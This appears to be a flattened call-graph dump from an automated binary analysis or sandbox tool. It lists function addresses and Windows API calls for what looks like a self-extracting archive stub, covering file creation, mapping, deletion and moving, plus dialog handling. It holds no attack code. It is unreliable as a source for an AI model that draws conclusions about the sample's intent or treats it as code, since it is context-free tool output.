25349 434636 __cftof 38 API calls 25348->25349 25350 43c9a8 MultiByteToWideChar 25349->25350 25352 43c9e6 25350->25352 25360 43ca7e 25350->25360 25355 438e06 __vswprintf_c_l 21 API calls 25352->25355 25358 43ca07 _abort __vsnwprintf_l 25352->25358 25353 42fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25356 43b92e 25353->25356 25354 43ca78 25367 43abc3 20 API calls _free 25354->25367 25355->25358 25362 43ab78 25356->25362 25358->25354 25359 43ca4c MultiByteToWideChar 25358->25359 25359->25354 25361 43ca68 GetStringTypeW 25359->25361 25360->25353 25361->25354 25363 434636 __cftof 38 API calls 25362->25363 25364 43ab8b 25363->25364 25368 43a95b 25364->25368 25367->25360 25369 43a976 __vswprintf_c_l 25368->25369 25370 43a99c MultiByteToWideChar 25369->25370 25371 43ab50 25370->25371 25372 43a9c6 25370->25372 25373 42fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25371->25373 25377 438e06 __vswprintf_c_l 21 API calls 25372->25377 25379 43a9e7 __vsnwprintf_l 25372->25379 25374 43ab63 25373->25374 25374->25347 25375 43aa30 MultiByteToWideChar 25376 43aa9c 25375->25376 25378 43aa49 25375->25378 25404 43abc3 20 API calls _free 25376->25404 25377->25379 25395 43af6c 25378->25395 25379->25375 25379->25376 25383 43aa73 25383->25376 25386 43af6c __vswprintf_c_l 11 API calls 25383->25386 25384 43aaab 25385 438e06 __vswprintf_c_l 21 API calls 25384->25385 25389 43aacc __vsnwprintf_l 25384->25389 25385->25389 25386->25376 25387 43ab41 25403 43abc3 20 API calls _free 25387->25403 25389->25387 25390 43af6c __vswprintf_c_l 11 API calls 25389->25390 25391 43ab20 25390->25391 25391->25387 25392 43ab2f WideCharToMultiByte 25391->25392 25392->25387 25393 43ab6f 25392->25393 25405 43abc3 20 API calls _free 25393->25405 25396 43ac98 _abort 5 API calls 25395->25396 25397 43af93 25396->25397 25400 43af9c 25397->25400 25406 43aff4 10 API calls 3 library calls 25397->25406 25399 43afdc LCMapStringW 25399->25400 25401 42fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25400->25401 25402 43aa60 25401->25402 25402->25376 25402->25383 25402->25384 25403->25376 25404->25371 25405->25376 25406->25399 25434 43c030 GetProcessHeap 23468 42dec2 23469 42decf 23468->23469 23476 41e617 23469->23476 23477 41e627 23476->23477 23488 41e648 23477->23488 23480 414092 23511 414065 23480->23511 23483 42b568 PeekMessageW 23484 42b583 GetMessageW 23483->23484 23485 42b5bc 23483->23485 23486 42b5a8 TranslateMessage DispatchMessageW 23484->23486 23487 42b599 IsDialogMessageW 23484->23487 23486->23485 23487->23485 23487->23486 23494 41d9b0 23488->23494 23491 41e645 23491->23480 23492 41e66b LoadStringW 23492->23491 23493 41e682 LoadStringW 23492->23493 23493->23491 23499 41d8ec 23494->23499 23496 41d9cd 23497 41d9e2 23496->23497 23507 41d9f0 26 API calls 23496->23507 23497->23491 23497->23492 23500 41d904 23499->23500 23506 41d984 _strncpy 23499->23506 23502 41d928 23500->23502 23508 421da7 WideCharToMultiByte 23500->23508 23505 41d959 23502->23505 23509 41e5b1 50 API calls __vsnprintf 23502->23509 23510 436159 26 API calls 3 library calls 23505->23510 23506->23496 23507->23497 23508->23502 23509->23505 23510->23506 23512 41407c __vsnwprintf_l 23511->23512 23515 435fd4 23512->23515 23518 434097 23515->23518 23519 4340d7 23518->23519 23520 4340bf 23518->23520 23519->23520 23522 4340df 23519->23522 23542 4391a8 20 API calls _abort 23520->23542 23544 434636 23522->23544 23523 4340c4 23543 439087 26 API calls _abort 23523->23543 23529 434167 23553 4349e6 51 API calls 4 library calls 23529->23553 23530 414086 SetDlgItemTextW 23530->23483 23533 4340cf 23535 42fbbc 23533->23535 23534 434172 23554 4346b9 20 API calls _free 23534->23554 23536 42fbc4 23535->23536 23537 42fbc5 IsProcessorFeaturePresent 23535->23537 23536->23530 23539 42fc07 23537->23539 23555 42fbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23539->23555 23541 42fcea 23541->23530 23542->23523 23543->23533 23545 434653 23544->23545 23551 4340ef 23544->23551 23545->23551 23556 4397e5 GetLastError 23545->23556 23547 434674 23576 43993a 38 API calls __cftof 23547->23576 23549 43468d 23577 439967 38 API calls __cftof 23549->23577 23552 434601 20 API calls 2 library calls 23551->23552 23552->23529 23553->23534 23554->23533 23555->23541 23557 439801 23556->23557 23558 4397fb 23556->23558 23562 439850 SetLastError 23557->23562 23579 43b136 23557->23579 23578 43ae5b 11 API calls 2 library calls 23558->23578 23562->23547 23563 43981b 23586 438dcc 23563->23586 23566 439830 23566->23563 23568 439837 23566->23568 23567 439821 23569 43985c SetLastError 23567->23569 23593 439649 20 API calls _abort 23568->23593 23594 438d24 38 API calls _abort 23569->23594 23572 439842 23574 438dcc _free 20 API calls 23572->23574 23575 439849 23574->23575 23575->23562 23575->23569 23576->23549 23577->23551 23578->23557 23584 43b143 _abort 23579->23584 23580 43b183 23596 4391a8 20 API calls _abort 23580->23596 23581 43b16e RtlAllocateHeap 23582 439813 23581->23582 23581->23584 23582->23563 23592 43aeb1 11 API calls 2 library calls 23582->23592 23584->23580 23584->23581 23595 437a5e 7 API calls 2 library calls 23584->23595 23587 438dd7 RtlFreeHeap 23586->23587 23588 438e00 __dosmaperr 23586->23588 23587->23588 23589 438dec 23587->23589 23588->23567 23597 4391a8 20 API calls _abort 23589->23597 23591 438df2 GetLastError 23591->23588 23592->23566 23593->23572 23595->23584 23596->23582 23597->23591 25479 42b5c0 100 API calls 25480 4277c0 118 API calls 25481 42ffc0 RaiseException _com_error::_com_error CallUnexpected 25435 4262ca 123 API calls __InternalCxxFrameHandler 25438 42f4d3 20 API calls 23663 42e1d1 14 API calls ___delayLoadHelper2@8 25483 43a3d0 21 API calls 2 library calls 23664 4110d5 23669 415abd 23664->23669 23670 415ac7 __EH_prolog 23669->23670 23676 41b505 23670->23676 23672 415ad3 23682 415cac GetCurrentProcess GetProcessAffinityMask 23672->23682 23677 41b50f __EH_prolog 23676->23677 23683 41f1d0 82 API calls 23677->23683 23679 41b521 23684 41b61e 23679->23684 23683->23679 23685 41b630 _abort 23684->23685 23688 4210dc 23685->23688 23691 42109e GetCurrentProcess GetProcessAffinityMask 23688->23691 23692 41b597 23691->23692 23692->23672 25484 442bd0 VariantClear 23693 42e2d7 23694 42e1db 23693->23694 23695 42e85d ___delayLoadHelper2@8 14 API calls 23694->23695 23695->23694 25440 430ada 51 API calls 2 library calls 23803 4113e1 84 API calls 2 library calls 23804 42b7e0 23805 42b7ea __EH_prolog 23804->23805 23970 411316 23805->23970 23808 42b82a 23811 42b89b 23808->23811 23812 42b838 23808->23812 23882 42b841 23808->23882 23809 42bf0f 24042 42d69e 23809->24042 23814 42b92e GetDlgItemTextW 23811->23814 23819 42b8b1 23811->23819 23815 42b878 23812->23815 23816 42b83c 23812->23816 23814->23815 23822 42b96b 23814->23822 23827 42b95f EndDialog 23815->23827 23815->23882 23825 41e617 53 API calls 23816->23825 23816->23882 23817 42bf2a SendMessageW 23818 42bf38 23817->23818 23820 42bf52 GetDlgItem SendMessageW 23818->23820 23821 42bf41 SendDlgItemMessageW 23818->23821 23824 41e617 53 API calls 23819->23824 24060 42a64d GetCurrentDirectoryW 23820->24060 23821->23820 23823 42b980 GetDlgItem 23822->23823 23968 42b974 23822->23968 23828 42b9b7 SetFocus 23823->23828 23829 42b994 SendMessageW SendMessageW 23823->23829 23830 42b8ce SetDlgItemTextW 23824->23830 23831 42b85b 23825->23831 23827->23882 23833 42b9c7 23828->23833 23849 42b9e0 23828->23849 23829->23828 23834 42b8d9 23830->23834 24080 41124f SHGetMalloc 23831->24080 23832 42bf82 GetDlgItem 23836 42bfa5 SetWindowTextW 23832->23836 23837 42bf9f 23832->23837 23839 41e617 53 API calls 23833->23839 23842 42b8e6 GetMessageW 23834->23842 23834->23882 24061 42abab GetClassNameW 23836->24061 23837->23836 23843 42b9d1 23839->23843 23840 42be55 23844 41e617 53 API calls 23840->23844 23847 42b8fd IsDialogMessageW 23842->23847 23842->23882 24081 42d4d4 23843->24081 23845 42be65 SetDlgItemTextW 23844->23845 23851 42be79 23845->23851 23847->23834 23853 42b90c TranslateMessage DispatchMessageW 23847->23853 23854 41e617 53 API calls 23849->23854 23850 42c1fc SetDlgItemTextW 23850->23882 23855 41e617 53 API calls 23851->23855 23853->23834 23857 42ba17 23854->23857 23893 42be9c _wcslen 23855->23893 23856 42bff0 23862 42c020 23856->23862 23865 41e617 53 API calls 23856->23865 23858 414092 _swprintf 51 API calls 23857->23858 23863 42ba29 23858->23863 23859 42b9d9 23980 41a0b1 23859->23980 23861 42c73f 97 API calls 23861->23856 23866 42c73f 97 API calls 23862->23866 23923 42c0d8 23862->23923 23867 42d4d4 16 API calls 23863->23867 23871 42c003 SetDlgItemTextW 23865->23871 23872 42c03b 23866->23872 23867->23859 23868 42c18b 23873 42c194 EnableWindow 23868->23873 23874 42c19d 23868->23874 23869 42ba73 23986 42ac04 SetCurrentDirectoryW 23869->23986 23870 42ba68 GetLastError 23870->23869 23876 41e617 53 API calls 23871->23876 23883 42c04d 23872->23883 23913 42c072 23872->23913 23873->23874 23879 42c1ba 23874->23879 24099 4112d3 GetDlgItem EnableWindow 23874->24099 23875 42beed 23878 41e617 53 API calls 23875->23878 23880 42c017 SetDlgItemTextW 23876->23880 23878->23882 23886 42c1e1 23879->23886 23898 42c1d9 SendMessageW 23879->23898 23880->23862 23881 42ba87 23887 42ba90 GetLastError 23881->23887 23888 42ba9e 23881->23888 24097 429ed5 32 API calls 23883->24097 23884 42c0cb 23889 42c73f 97 API calls 23884->23889 23886->23882 23900 41e617 53 API calls 23886->23900 23887->23888 23890 42bb11 23888->23890 23894 42bb20 23888->23894 23899 42baae GetTickCount 23888->23899 23889->23923 23890->23894 23895 42bd56 23890->23895 23892 42c1b0 24100 4112d3 GetDlgItem EnableWindow 23892->24100 23893->23875 23901 41e617 53 API calls 23893->23901 23902 42bcfb 23894->23902 23903 42bcf1 23894->23903 23904 42bb39 GetModuleFileNameW 23894->23904 24002 4112f1 GetDlgItem ShowWindow 23895->24002 23896 42c066 23896->23913 23898->23886 23907 414092 _swprintf 51 API calls 23899->23907 23908 42b862 23900->23908 23909 42bed0 23901->23909 23912 41e617 53 API calls 23902->23912 23903->23815 23903->23902 24091 41f28c 82 API calls 23904->24091 23905 42c169 24098 429ed5 32 API calls 23905->24098 23915 42bac7 23907->23915 23908->23850 23908->23882 23916 414092 _swprintf 51 API calls 23909->23916 23919 42bd05 23912->23919 23913->23884 23920 42c73f 97 API calls 23913->23920 23914 42bd66 24003 4112f1 GetDlgItem ShowWindow 23914->24003 23987 41966e 23915->23987 23916->23875 23917 42bb5f 23924 414092 _swprintf 51 API calls 23917->23924 23918 42c188 23918->23868 23925 414092 _swprintf 51 API calls 23919->23925 23926 42c0a0 23920->23926 23922 41e617 53 API calls 23922->23923 23923->23868 23923->23905 23923->23922 23928 42bb81 CreateFileMappingW 23924->23928 23929 42bd23 23925->23929 23926->23884 23930 42c0a9 DialogBoxParamW 23926->23930 23927 42bd70 23931 41e617 53 API calls 23927->23931 23933 42bbe3 GetCommandLineW 23928->23933 23963 42bc60 __InternalCxxFrameHandler 23928->23963 23941 41e617 53 API calls 23929->23941 23930->23815 23930->23884 23934 42bd7a SetDlgItemTextW 23931->23934 23936 42bbf4 23933->23936 24004 4112f1 GetDlgItem ShowWindow 23934->24004 23935 42baed 23938 42baff 23935->23938 23939 42baf4 GetLastError 23935->23939 24092 42b425 SHGetMalloc 23936->24092 23995 41959a 23938->23995 23939->23938 23945 42bd3d 23941->23945 23942 42bd8c SetDlgItemTextW GetDlgItem 23946 42bdc1 23942->23946 23947 42bda9 GetWindowLongW SetWindowLongW 23942->23947 23944 42bc10 24093 42b425 SHGetMalloc 23944->24093 24005 42c73f 23946->24005 23947->23946 23950 42bc1c 24094 42b425 SHGetMalloc 23950->24094 23953 42c73f 97 API calls 23954 42bddd 23953->23954 24030 42da52 23954->24030 23955 42bc28 24095 41f3fa 82 API calls 2 library calls 23955->24095 23958 42bccb 23958->23903 23962 42bce1 UnmapViewOfFile CloseHandle 23958->23962 23960 42bc3f MapViewOfFile 23960->23963 23961 42c73f 97 API calls 23966 42be03 23961->23966 23962->23903 23963->23958 23964 42bcb7 Sleep 23963->23964 23964->23958 23964->23963 23965 42be2c 24096 4112d3 GetDlgItem EnableWindow 23965->24096 23966->23965 23969 42c73f 97 API calls 23966->23969 23968->23815 23968->23840 23969->23965 23971 411378 23970->23971 23972 41131f 23970->23972 24102 41e2c1 GetWindowLongW SetWindowLongW 23971->24102 23974 411385 23972->23974 24101 41e2e8 62 API calls 2 library calls 23972->24101 23974->23808 23974->23809 23974->23882 23976 411341 23976->23974 23977 411354 GetDlgItem 23976->23977 23977->23974 23978 411364 23977->23978 23978->23974 23979 41136a SetWindowTextW 23978->23979 23979->23974 23982 41a0bb 23980->23982 23981 41a175 23981->23869 23981->23870 23982->23981 23983 41a14c 23982->23983 24103 41a2b2 23982->24103 23983->23981 23984 41a2b2 8 API calls 23983->23984 23984->23981 23986->23881 23988 419678 23987->23988 23989 4196d5 CreateFileW 23988->23989 23990 4196c9 23988->23990 23989->23990 23991 41971f 23990->23991 23992 41bb03 GetCurrentDirectoryW 23990->23992 23991->23935 23993 419704 23992->23993 23993->23991 23994 419708 CreateFileW 23993->23994 23994->23991 23996 4195cf 23995->23996 23997 4195be 23995->23997 23996->23890 23997->23996 23998 4195d1 23997->23998 23999 4195ca 23997->23999 24129 419620 23998->24129 24124 41974e 23999->24124 24002->23914 24003->23927 24004->23942 24006 42c749 __EH_prolog 24005->24006 24007 42bdcf 24006->24007 24008 42b314 ExpandEnvironmentStringsW 24006->24008 24007->23953 24015 42c780 _wcslen _wcsrchr 24008->24015 24010 42b314 ExpandEnvironmentStringsW 24010->24015 24011 42ca67 SetWindowTextW 24011->24015 24014 433e3e 22 API calls 24014->24015 24015->24007 24015->24010 24015->24011 24015->24014 24017 42c855 SetFileAttributesW 24015->24017 24022 42cc31 GetDlgItem SetWindowTextW SendMessageW 24015->24022 24025 42cc71 SendMessageW 24015->24025 24144 421fbb CompareStringW 24015->24144 24145 42a64d GetCurrentDirectoryW 24015->24145 24147 41a5d1 6 API calls 24015->24147 24148 41a55a FindClose 24015->24148 24149 42b48e 76 API calls 2 library calls 24015->24149 24018 42c90f GetFileAttributesW 24017->24018 24029 42c86f _abort _wcslen 24017->24029 24018->24015 24021 42c921 DeleteFileW 24018->24021 24021->24015 24023 42c932 24021->24023 24022->24015 24024 414092 _swprintf 51 API calls 24023->24024 24026 42c952 GetFileAttributesW 24024->24026 24025->24015 24026->24023 24027 42c967 MoveFileW 24026->24027 24027->24015 24028 42c97f MoveFileExW 24027->24028 24028->24015 24029->24015 24029->24018 24146 41b991 51 API calls 3 library calls 24029->24146 24031 42da5c __EH_prolog 24030->24031 24150 420659 24031->24150 24033 42da8d 24154 415b3d 24033->24154 24035 42daab 24158 417b0d 24035->24158 24039 42dafe 24174 417b9e 24039->24174 24041 42bdee 24041->23961 24043 42d6a8 24042->24043 24668 42a5c6 24043->24668 24046 42bf15 24046->23817 24046->23818 24047 42d6b5 GetWindow 24047->24046 24050 42d6d5 24047->24050 24048 42d6e2 GetClassNameW 24673 421fbb CompareStringW 24048->24673 24050->24046 24050->24048 24051 42d706 GetWindowLongW 24050->24051 24052 42d76a GetWindow 24050->24052 24051->24052 24053 42d716 SendMessageW 24051->24053 24052->24046 24052->24050 24053->24052 24054 42d72c GetObjectW 24053->24054 24674 42a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24054->24674 24056 42d743 24675 42a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24056->24675 24676 42a80c 8 API calls 24056->24676 24059 42d754 SendMessageW DeleteObject 24059->24052 24060->23832 24062 42abf1 24061->24062 24063 42abcc 24061->24063 24067 42b093 24062->24067 24679 421fbb CompareStringW 24063->24679 24065 42abdf 24065->24062 24066 42abe3 FindWindowExW 24065->24066 24066->24062 24068 42b09d __EH_prolog 24067->24068 24069 4113dc 84 API calls 24068->24069 24070 42b0bf 24069->24070 24680 411fdc 24070->24680 24073 42b0eb 24076 4119af 128 API calls 24073->24076 24074 42b0d9 24075 411692 86 API calls 24074->24075 24077 42b0e4 24075->24077 24079 42b10d __InternalCxxFrameHandler ___std_exception_copy 24076->24079 24077->23856 24077->23861 24078 411692 86 API calls 24078->24077 24079->24078 24080->23908 24082 42b568 5 API calls 24081->24082 24083 42d4e0 GetDlgItem 24082->24083 24084 42d536 SendMessageW SendMessageW 24083->24084 24085 42d502 24083->24085 24086 42d572 24084->24086 24087 42d591 SendMessageW SendMessageW SendMessageW 24084->24087 24088 42d50d ShowWindow SendMessageW SendMessageW 24085->24088 24086->24087 24089 42d5e7 SendMessageW 24087->24089 24090 42d5c4 SendMessageW 24087->24090 24088->24084 24089->23859 24090->24089 24091->23917 24092->23944 24093->23950 24094->23955 24095->23960 24096->23968 24097->23896 24098->23918 24099->23892 24100->23879 24101->23976 24102->23974 24104 41a2bf 24103->24104 24105 41a2e3 24104->24105 24106 41a2d6 CreateDirectoryW 24104->24106 24107 41a231 3 API calls 24105->24107 24106->24105 24108 41a316 24106->24108 24109 41a2e9 24107->24109 24111 41a325 24108->24111 24116 41a4ed 24108->24116 24110 41a329 GetLastError 24109->24110 24112 41bb03 GetCurrentDirectoryW 24109->24112 24110->24111 24111->23982 24114 41a2ff 24112->24114 24114->24110 24115 41a303 CreateDirectoryW 24114->24115 24115->24108 24115->24110 24117 42ec50 24116->24117 24118 41a4fa SetFileAttributesW 24117->24118 24119 41a510 24118->24119 24120 41a53d 24118->24120 24121 41bb03 GetCurrentDirectoryW 24119->24121 24120->24111 24122 41a524 24121->24122 24122->24120 24123 41a528 SetFileAttributesW 24122->24123 24123->24120 24125 419781 24124->24125 24126 419757 24124->24126 24125->23996 24126->24125 24135 41a1e0 24126->24135 24131 41962c 24129->24131 24132 41964a 24129->24132 24130 419669 24130->23996 24131->24132 24133 419638 CloseHandle 24131->24133 24132->24130 24143 416bd5 76 API calls 24132->24143 24133->24132 24136 42ec50 24135->24136 24137 41a1ed DeleteFileW 24136->24137 24138 41a200 24137->24138 24139 41977f 24137->24139 24140 41bb03 GetCurrentDirectoryW 24138->24140 24139->23996 24141 41a214 24140->24141 24141->24139 24142 41a218 DeleteFileW 24141->24142 24142->24139 24143->24130 24144->24015 24145->24015 24146->24029 24147->24015 24148->24015 24149->24015 24151 420666 _wcslen 24150->24151 24178 4117e9 24151->24178 24153 42067e 24153->24033 24155 420659 _wcslen 24154->24155 24156 4117e9 78 API calls 24155->24156 24157 42067e 24156->24157 24157->24035 24159 417b17 __EH_prolog 24158->24159 24195 41ce40 24159->24195 24161 417b32 24201 42eb38 24161->24201 24163 417b5c 24210 424a76 24163->24210 24166 417c7d 24167 417c87 24166->24167 24169 417cf1 24167->24169 24242 41a56d 24167->24242 24172 417d50 24169->24172 24220 418284 24169->24220 24170 417d92 24170->24039 24172->24170 24248 41138b 74 API calls 24172->24248 24175 417bac 24174->24175 24177 417bb3 24174->24177 24176 422297 86 API calls 24175->24176 24176->24177 24179 4117ff 24178->24179 24190 41185a __InternalCxxFrameHandler 24178->24190 24180 411828 24179->24180 24191 416c36 76 API calls __vswprintf_c_l 24179->24191 24182 411887 24180->24182 24187 411847 ___std_exception_copy 24180->24187 24184 433e3e 22 API calls 24182->24184 24183 41181e 24192 416ca7 75 API calls 24183->24192 24186 41188e 24184->24186 24186->24190 24194 416ca7 75 API calls 24186->24194 24187->24190 24193 416ca7 75 API calls 24187->24193 24190->24153 24191->24183 24192->24180 24193->24190 24194->24190 24196 41ce4a __EH_prolog 24195->24196 24197 42eb38 8 API calls 24196->24197 24198 41ce8d 24197->24198 24199 42eb38 8 API calls 24198->24199 24200 41ceb1 24199->24200 24200->24161 24203 42eb3d ___std_exception_copy 24201->24203 24202 42eb57 24202->24163 24203->24202 24206 42eb59 24203->24206 24216 437a5e 7 API calls 2 library calls 24203->24216 24205 42f5c9 24218 43238d RaiseException 24205->24218 24206->24205 24217 43238d RaiseException 24206->24217 24209 42f5e6 24211 424a80 __EH_prolog 24210->24211 24212 42eb38 8 API calls 24211->24212 24213 424a9c 24212->24213 24214 417b8b 24213->24214 24219 420e46 80 API calls 24213->24219 24214->24166 24216->24203 24217->24205 24218->24209 24219->24214 24221 41828e __EH_prolog 24220->24221 24249 4113dc 24221->24249 24223 4182aa 24224 4182bb 24223->24224 24392 419f42 24223->24392 24227 4182f2 24224->24227 24257 411a04 24224->24257 24388 411692 24227->24388 24230 4182ee 24230->24227 24238 41a56d 7 API calls 24230->24238 24239 418389 24230->24239 24396 41c0c5 CompareStringW _wcslen 24230->24396 24233 4183e8 24284 411f6d 24233->24284 24238->24230 24276 418430 24239->24276 24241 4183f3 24241->24227 24288 413b2d 24241->24288 24300 41848e 24241->24300 24243 41a582 24242->24243 24247 41a5b0 24243->24247 24657 41a69b 24243->24657 24245 41a592 24246 41a597 FindClose 24245->24246 24245->24247 24246->24247 24247->24167 24248->24170 24250 4113e1 __EH_prolog 24249->24250 24251 41ce40 8 API calls 24250->24251 24252 411419 24251->24252 24253 42eb38 8 API calls 24252->24253 24256 411474 _abort 24252->24256 24254 411461 24253->24254 24255 41b505 84 API calls 24254->24255 24254->24256 24255->24256 24256->24223 24258 411a0e __EH_prolog 24257->24258 24270 411a61 24258->24270 24273 411b9b 24258->24273 24397 4113ba 24258->24397 24260 411bd4 24264 413b2d 101 API calls 24260->24264 24260->24273 24261 411bc7 24409 41138b 74 API calls 24261->24409 24265 411c12 24264->24265 24266 411c5a 24265->24266 24268 413b2d 101 API calls 24265->24268 24269 411c8d 24266->24269 24266->24273 24410 41138b 74 API calls 24266->24410 24268->24265 24269->24273 24274 419e80 79 API calls 24269->24274 24270->24260 24270->24261 24270->24273 24271 413b2d 101 API calls 24272 411cde 24271->24272 24272->24271 24272->24273 24273->24230 24274->24272 24430 41cf3d 24276->24430 24278 418440 24434 4213d2 GetSystemTime SystemTimeToFileTime 24278->24434 24280 4183a3 24280->24233 24281 421b66 24280->24281 24439 42de6b 24281->24439 24285 411f72 __EH_prolog 24284->24285 24287 411fa6 24285->24287 24447 4119af 24285->24447 24287->24241 24289 413b39 24288->24289 24290 413b3d 24288->24290 24289->24241 24299 419e80 79 API calls 24290->24299 24291 413b4f 24292 413b78 24291->24292 24293 413b6a 24291->24293 24580 41286b 101 API calls 3 library calls 24292->24580 24294 413baa 24293->24294 24579 4132f7 89 API calls 2 library calls 24293->24579 24294->24241 24297 413b76 24297->24294 24581 4120d7 74 API calls 24297->24581 24299->24291 24301 418498 __EH_prolog 24300->24301 24304 4184d5 24301->24304 24311 418513 24301->24311 24606 428c8d 103 API calls 24301->24606 24303 4184f5 24305 4184fa 24303->24305 24306 41851c 24303->24306 24304->24303 24309 41857a 24304->24309 24304->24311 24305->24311 24607 417a0d 152 API calls 24305->24607 24306->24311 24608 428c8d 103 API calls 24306->24608 24309->24311 24582 415d1a 24309->24582 24311->24241 24312 418605 24312->24311 24588 418167 24312->24588 24315 418797 24316 41a56d 7 API calls 24315->24316 24319 418802 24315->24319 24316->24319 24318 41d051 82 API calls 24320 41885d 24318->24320 24594 417c0d 24319->24594 24320->24311 24320->24318 24321 41898b 24320->24321 24322 418992 24320->24322 24609 418117 84 API calls 24320->24609 24610 412021 74 API calls 24320->24610 24611 412021 74 API calls 24321->24611 24325 4189e1 24322->24325 24326 418a5f 24322->24326 24331 41a231 3 API calls 24325->24331 24334 418a4c 24325->24334 24336 418b14 24325->24336 24327 418ab6 24326->24327 24339 418a6a 24326->24339 24327->24334 24614 417fc0 97 API calls 24327->24614 24328 419105 24333 41959a 80 API calls 24328->24333 24329 418ab4 24330 41959a 80 API calls 24329->24330 24330->24311 24335 418a19 24331->24335 24333->24311 24334->24329 24334->24336 24335->24334 24612 4192a3 97 API calls 24335->24612 24336->24328 24348 418b82 24336->24348 24615 4198bc 24336->24615 24337 41ab1a 8 API calls 24340 418bd1 24337->24340 24339->24329 24613 417db2 101 API calls 24339->24613 24343 41ab1a 8 API calls 24340->24343 24360 418be7 24343->24360 24346 418b70 24619 416e98 77 API calls 24346->24619 24348->24337 24349 418cbc 24350 418e40 24349->24350 24351 418d18 24349->24351 24354 418e52 24350->24354 24355 418e66 24350->24355 24374 418d49 24350->24374 24352 418d8a 24351->24352 24353 418d28 24351->24353 24362 418167 19 API calls 24352->24362 24358 418d6e 24353->24358 24365 418d37 24353->24365 24356 419215 123 API calls 24354->24356 24357 423377 75 API calls 24355->24357 24356->24374 24359 418e7f 24357->24359 24358->24374 24622 4177b8 111 API calls 24358->24622 24625 423020 123 API calls 24359->24625 24360->24349 24361 418c93 24360->24361 24368 41981a 79 API calls 24360->24368 24361->24349 24620 419a3c 82 API calls 24361->24620 24366 418dbd 24362->24366 24621 412021 74 API calls 24365->24621 24370 418df5 24366->24370 24371 418de6 24366->24371 24366->24374 24368->24361 24624 419155 93 API calls __EH_prolog 24370->24624 24623 417542 85 API calls 24371->24623 24377 418f85 24374->24377 24626 412021 74 API calls 24374->24626 24376 419090 24376->24328 24378 41a4ed 3 API calls 24376->24378 24377->24328 24377->24376 24379 41903e 24377->24379 24600 419f09 SetEndOfFile 24377->24600 24380 4190eb 24378->24380 24601 419da2 24379->24601 24380->24328 24627 412021 74 API calls 24380->24627 24383 419085 24385 419620 77 API calls 24383->24385 24385->24376 24386 4190fb 24628 416dcb 76 API calls _wcschr 24386->24628 24389 4116a4 24388->24389 24644 41cee1 24389->24644 24393 419f59 24392->24393 24394 419f63 24393->24394 24656 416d0c 78 API calls 24393->24656 24394->24224 24396->24230 24411 411732 24397->24411 24399 4113d6 24400 419e80 24399->24400 24402 419e92 24400->24402 24403 419ea5 24400->24403 24401 419eb0 24401->24270 24402->24401 24428 416d5b 77 API calls 24402->24428 24403->24401 24404 419eb8 SetFilePointer 24403->24404 24404->24401 24406 419ed4 GetLastError 24404->24406 24406->24401 24407 419ede 24406->24407 24407->24401 24429 416d5b 77 API calls 24407->24429 24409->24273 24410->24269 24412 411748 24411->24412 24423 4117a0 __InternalCxxFrameHandler 24411->24423 24413 411771 24412->24413 24424 416c36 76 API calls __vswprintf_c_l 24412->24424 24415 4117c7 24413->24415 24420 41178d ___std_exception_copy 24413->24420 24417 433e3e 22 API calls 24415->24417 24416 411767 24425 416ca7 75 API calls 24416->24425 24419 4117ce 24417->24419 24419->24423 24427 416ca7 75 API calls 24419->24427 24420->24423 24426 416ca7 75 API calls 24420->24426 24423->24399 24424->24416 24425->24413 24426->24423 24427->24423 24428->24403 24429->24401 24431 41cf4d 24430->24431 24433 41cf54 24430->24433 24435 41981a 24431->24435 24433->24278 24434->24280 24436 419833 24435->24436 24438 419e80 79 API calls 24436->24438 24437 419865 24437->24433 24438->24437 24440 42de78 24439->24440 24441 41e617 53 API calls 24440->24441 24442 42de9b 24441->24442 24443 414092 _swprintf 51 API calls 24442->24443 24444 42dead 24443->24444 24445 42d4d4 16 API calls 24444->24445 24446 421b7c 24445->24446 24446->24233 24448 4119bb 24447->24448 24449 4119bf 24447->24449 24448->24287 24452 419e80 79 API calls 24449->24452 24450 4119d4 24453 4118f6 24450->24453 24452->24450 24454 411908 24453->24454 24455 411945 24453->24455 24456 413b2d 101 API calls 24454->24456 24461 413fa3 24455->24461 24459 411928 24456->24459 24459->24448 24463 413fac 24461->24463 24462 413b2d 101 API calls 24462->24463 24463->24462 24465 411966 24463->24465 24478 420e08 24463->24478 24465->24459 24466 411e50 24465->24466 24467 411e5a __EH_prolog 24466->24467 24486 413bba 24467->24486 24469 411e84 24470 411732 78 API calls 24469->24470 24472 411f0b 24469->24472 24471 411e9b 24470->24471 24514 4118a9 78 API calls 24471->24514 24472->24459 24474 411eb3 24476 411ebf _wcslen 24474->24476 24515 421b84 MultiByteToWideChar 24474->24515 24516 4118a9 78 API calls 24476->24516 24479 420e0f 24478->24479 24480 420e2a 24479->24480 24484 416c31 RaiseException CallUnexpected 24479->24484 24482 420e3b SetThreadExecutionState 24480->24482 24485 416c31 RaiseException CallUnexpected 24480->24485 24482->24463 24484->24480 24485->24482 24487 413bc4 __EH_prolog 24486->24487 24488 413bf6 24487->24488 24489 413bda 24487->24489 24491 413e51 24488->24491 24494 413c22 24488->24494 24542 41138b 74 API calls 24489->24542 24559 41138b 74 API calls 24491->24559 24493 413be5 24493->24469 24494->24493 24517 423377 24494->24517 24496 413ca3 24497 413d2e 24496->24497 24513 413c9a 24496->24513 24545 41d051 24496->24545 24527 41ab1a 24497->24527 24498 413c9f 24498->24496 24544 4120bd 78 API calls 24498->24544 24500 413c71 24500->24496 24500->24498 24501 413c8f 24500->24501 24543 41138b 74 API calls 24501->24543 24503 413d41 24507 413dd7 24503->24507 24508 413dc7 24503->24508 24551 423020 123 API calls 24507->24551 24531 419215 24508->24531 24511 413dd5 24511->24513 24552 412021 74 API calls 24511->24552 24553 422297 24513->24553 24514->24474 24515->24476 24516->24472 24518 42338c 24517->24518 24520 423396 ___std_exception_copy 24517->24520 24560 416ca7 75 API calls 24518->24560 24521 42341c 24520->24521 24522 4234c6 24520->24522 24526 423440 _abort 24520->24526 24561 4232aa 75 API calls 3 library calls 24521->24561 24562 43238d RaiseException 24522->24562 24525 4234f2 24526->24500 24528 41ab28 24527->24528 24530 41ab32 24527->24530 24529 42eb38 8 API calls 24528->24529 24529->24530 24530->24503 24532 41921f __EH_prolog 24531->24532 24563 417c64 24532->24563 24535 4113ba 78 API calls 24536 419231 24535->24536 